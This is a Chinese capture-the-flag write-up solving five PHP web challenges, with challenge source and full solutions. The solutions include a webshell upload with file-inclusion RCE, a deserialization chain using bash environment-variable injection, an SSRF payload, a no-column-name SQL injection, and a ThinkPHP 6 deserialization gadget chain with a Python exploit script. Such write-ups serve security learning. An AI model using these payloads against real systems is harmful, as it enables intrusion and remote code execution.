目录
100%_upload
Not just unserialize
EZ_SSRF
hacker
Oyst3rPHP
还是只会做php,java根本动不了(绝望
100%_upload
有个文件包含,可以伪协议读下源码
php://filter/read=convert.base64-encode/resource=upload.php
<?php
if(isset($_FILES['upfile'])){
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['upfile']['name']);
$ext = pathinfo($_FILES['upfile']['name'],PATHINFO_EXTENSION);
$text = file_get_contents($_FILES['upfile']['tmp_name']);
echo $ext;
if (!preg_match("/ph.|hta***ess/i", $ext)){
if(preg_match("/<\?php/i", $text)){
echo "茂夫说:你的文件内容不太对劲哦<br>";
}
else{
move_uploaded_file($_FILES['upfile']['tmp_name'],$uploadfile);
echo "上传成功<br>路径为:" . $uploadfile . "<br>";
}
}
else {
echo "恶意后缀哦<br>";
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-***patible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>上传文件</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
background-image: url('100.jpg');
background-size: cover;
background-position: center;
}
.container {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
form {
background-color: rgba(255, 255, 255, 0.8);
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
input[type="file"] {
margin-bottom: 10px;
}
input[type="submit"] {
background-color: #007bff;
color: #fff;
padding: 10px 15px;
border: none;
border-radius: 4px;
cursor: pointer;
}
input[type="submit"]:hover {
background-color: #0056b3;
}
</style>
</head>
<body>
<div class="container">
<form action="upload.php" method="POST" enctype="multipart/form-data">
<p>请不要上传php脚本哈,不然我们可爱的茂夫要生气啦</p>
<input type="file" name="upfile" value="" />
<br>
<input type="submit" name="submit" value="提交" />
</form>
</div>
</body>
</html>
不能上传php文件,并且不能传<?php 开头的
那么上传内容为<?=eval($_POST[1]);?>的图片马
配合文件包含RCE
Not just unserialize
题目信息
命令执行软连接到bash ,结合下面源码可以用bash环境变量注入
我是如何利用环境变量注入执行任意命令 - 跳跳糖
题目源码:
<?php
highlight_file(__FILE__);
class start
{
public $wel***e;
public $you;
public function __destruct()
{
$this->begin0fweb();
}
public function begin0fweb()
{
$p='hacker!';
$this->wel***e->you = $p;
}
}
class SE{
public $year;
public function __set($name, $value){
echo ' Wel***e to new year! ';
echo($this->year);
}
}
class CR {
public $last;
public $newyear;
public function __tostring() {
if (is_array($this->newyear)) {
echo 'nonono';
return false;
}
if (!preg_match('/worries/i',$this->newyear))
{
echo "empty it!";
return 0;
}
if(preg_match('/^.*(worries).*$/',$this->newyear)) {
echo 'Don\'t be worry';
} else {
echo 'Worries doesn\'t exists in the new year ';
empty($this->last->worries);
}
return false;
}
}
class ET{
public function __isset($name)
{
foreach ($_GET['get'] as $inject => $rce){
putenv("{$inject}={$rce}");
}
system("echo \"Haven't you get the secret?\"");
}
}
if(isset($_REQUEST['go'])){
unserialize(base64_decode($_REQUEST['go']));
}
?> 链子很好写
start __destruct -> start begin0fweb ->SE __set -> CR __toString ->ET __issetexp:
$a=new start();
$b=new SE();
$c=new CR();
$d=new ET();
$a->wel***e=$b;
$a->you='Z3r4y';
$b->year=$c;
$c->newyear='Worries';
$c->last=$d;
$c->worries='Z3r4y';
echo base64_encode(serialize($a));
//Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjM6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo3OiJXb3JyaWVzIjtzOjc6Indv***JpZXMiO3M6NToiWjNyNHkiO319czozOiJ5b3UiO3M6NToiWjNyNHkiO30=文章里有提到Bash 4.4及以上:env $'BASH_FUNC_echo%%=() { id; }' bash -c 'echo hello'
结合ET类,直接传入get[BASH_FUNC_echo%%]=() { cat /f*; }即可
最终payload:
?go=Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjM6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo3OiJXb3JyaWVzIjtzOjc6Indv***JpZXMiO3M6NToiWjNyNHkiO319czozOiJ5b3UiO3M6NToiWjNyNHkiO30=&get[BASH_FUNC_echo%%]=() { cat /f*; }EZ_SSRF
题目信息:
题目源码:
<?php
highlight_file(__file__);
error_reporting(0);
function get($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($curl);
curl_close($curl);
echo base64_encode($data);
return $data;
}
class client{
public $url;
public $payload;
public function __construct()
{
$url = "http://127.0.0.1/";
$payload = "system(\"cat /flag\");";
echo "Exploit";
}
public function __destruct()
{
get($this->url);
}
}
// hint:hide other file
if(isset($_GET['Harder'])) {
unserialize($_GET['Harder']);
} else {
echo "You don't know how to pass parameters?";
}
?> 目录本身穿越到顶了也就是/var/www/html下面,不能直接访问根目录下的/flag文件(如果有文件包含点的话那另当别论)
题目又提示我们有别的文件
拿dirsearch扫一下
访问/flag.php,一片空白,说明都是php代码,需要编码后才可读
访问/admin.php,源码如下
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
$allowed_ip = "127.0.0.1";
if ($_SERVER['REMOTE_ADDR'] !== $allowed_ip) {
die("You can't get flag");
} else {
echo $flag;
}
?>要求127.0.0.1访问,直接SSRF就行
exp:
$a=new client();
$a->url="http://127.0.0.1/admin.php";
$a->payload="Z3r4y";
echo serialize($a);最终payload:
?Harder=O:6:"client":2:{s:3:"url";s:26:"http://127.0.0.1/admin.php";s:7:"payload";s:5:"Z3r4y";}拿到base64编码后解码即可获得flag
hacker
注释告诉我们flag在flag表里
先简单fuzz一下
发现information_schema.tables被ban了,考虑无列名注入
【CTF】sql注入之无列名注入的姿势_sql注入不知道列名-CSDN博客
payload:
?username=1'/**/union/**/select/**/`2`/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)a%23列数一个一个试就行
Oyst3rPHP
这个logo一眼thinkphp,肯定是啥漏洞复现呗
初始界面除了一张图别的啥也没有,进行信息搜集
dirsearch扫出来www.zip
访问,下载,拿到源码
得知版本是tp6
index.php的Index类的index方法存在一个反序列化过程,然后还有一些八股绕过
md5加密相等绕过_php 值不相等 md值强相等-CSDN博客(因为string强制类型转换,所以不能数组绕过哈)
利用正则回溯最大次数上限绕过preg_match_正则回溯跟内容过大有关系吗-CSDN博客
然后反序列化用这个:ThinkPHP v6.0.x反序列化漏洞复现与分析_thinkphp v6.0.9漏洞-CSDN博客
稍微改改就能用
<?php
namespace think\model\concern;
trait Attribute
{
private $data = ["key"=>"cat /Oyst3333333r.php"];
private $withAttr = ["key"=>"system"];
}
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave = true;
protected $withEvent = false;
private $exists = true;
private $force = true;
protected $name;
public function __construct($obj=""){
$this->name=$obj;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{}
$a=new Pivot();
$b=new Pivot($a);
echo base64_encode(serialize($b));
最终exp:
import requests
url="http://yuanshen.life:37431/?left=QNKCDZO&right=s878926199a"
data={"key":'very'*250000+"603THINKPHP","payload":"TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjc6IgAqAG5hbWUiO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo3OntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo3OiIAKgBuYW1lIjtzOjA6IiI7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBo***I7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBo***I7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319"}
res=requests.post(url,data=data)
print(res.text)